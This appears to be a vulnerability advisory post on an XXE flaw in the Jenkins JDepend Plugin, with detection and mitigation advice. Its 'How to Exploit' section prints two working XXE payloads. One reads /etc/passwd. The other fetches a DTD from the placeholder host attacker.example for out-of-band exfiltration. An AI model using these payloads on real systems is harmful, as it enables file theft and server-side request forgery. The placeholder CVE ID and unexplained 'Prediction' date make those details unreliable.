Jenkins JDepend Plugin XXE Vulnerability CVE-2025-XXXX (High)


The Jenkins JDepend Plugin 1.3.1 and earlier bundles a vulnerable version of the JDepend Maven Plugin. That component parses the JDepend report with an outdated XML parser that is not configured to restrict XML External Entity (XXE) processing: when it reads the input file it still honours DOCTYPE declarations and resolves the external entities they define.

An attacker who can control the input file consumed by the "Report JDepend" build step (in practice, anyone who can write into the job's workspace, for example by committing to the repository the job builds) can therefore supply a crafted XML document whose DOCTYPE declares an external entity pointing at a path on the Jenkins controller file system, such as file:///etc/passwd, or at a remote URL. While parsing, the vulnerable parser fetches and inlines the referenced content. The result is disclosure of sensitive files readable by the Jenkins process on the controller, or server-side request forgery (SSRF), since the controller can be made to issue arbitrary HTTP requests from its own network position.
Platform: Jenkins (JDepend Plugin)
Version: 1.3.1 and earlier
Vulnerability: XXE
Severity: High
Date: 2024-10-29

Prediction: 2024-11-12

What Undercode Says:

Find XML inputs that carry a DTD, which is a prerequisite for this attack; a legitimate JDepend report has no reason to declare one:

`grep -r "DOCTYPE" project/`

Audit every call site that parses untrusted XML (for instance a Python helper doing `xml.dom.minidom.parse(xml_file)`) and confirm the parser it uses refuses DTDs. For the Java parser used by the plugin, the fix is to configure the factory before building the parser:

`DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();`

`dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);`

With that feature enabled the parser raises a SAXParseException as soon as it sees a DOCTYPE, so the external entity is never declared, let alone resolved.

How to Exploit:

Direct file read. The DOCTYPE declares a general entity backed by a local file, and the body references it, so the parser substitutes the file contents for `&xxe;`:

```xml
<?xml version="1.0"?>
<!DOCTYPE JDepend [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<JDepend>&xxe;</JDepend>
```

SSRF / blind variant. A parameter entity (`%ext;`) is expanded while the DTD itself is being processed, so the controller fetches the remote URL even if the parsed value is never shown back to the attacker. The host `attacker.example` is a placeholder for an attacker-controlled server:

```xml
<?xml version="1.0"?>
<!DOCTYPE JDepend [
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<JDepend/>
```

Whatever the fetched DTD declares is evaluated next, which is how out-of-band exfiltration of file contents is chained onto the initial request.

Protection from this CVE

Disable or uninstall the JDepend Plugin until a fixed release is available.

Await the official patch and upgrade as soon as it ships.

Use Jenkins' own security controls and plugins to restrict who can configure jobs and supply build inputs to the "Report JDepend" step.

Restrict file permissions on the controller: an external entity can only disclose files the Jenkins process is allowed to read.

Implement network segmentation so that requests originating from the controller cannot reach internal services that the SSRF would otherwise expose.

Impact:

Secret extraction

Server-Side Request Forgery

Information Disclosure

Arbitrary File Read


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
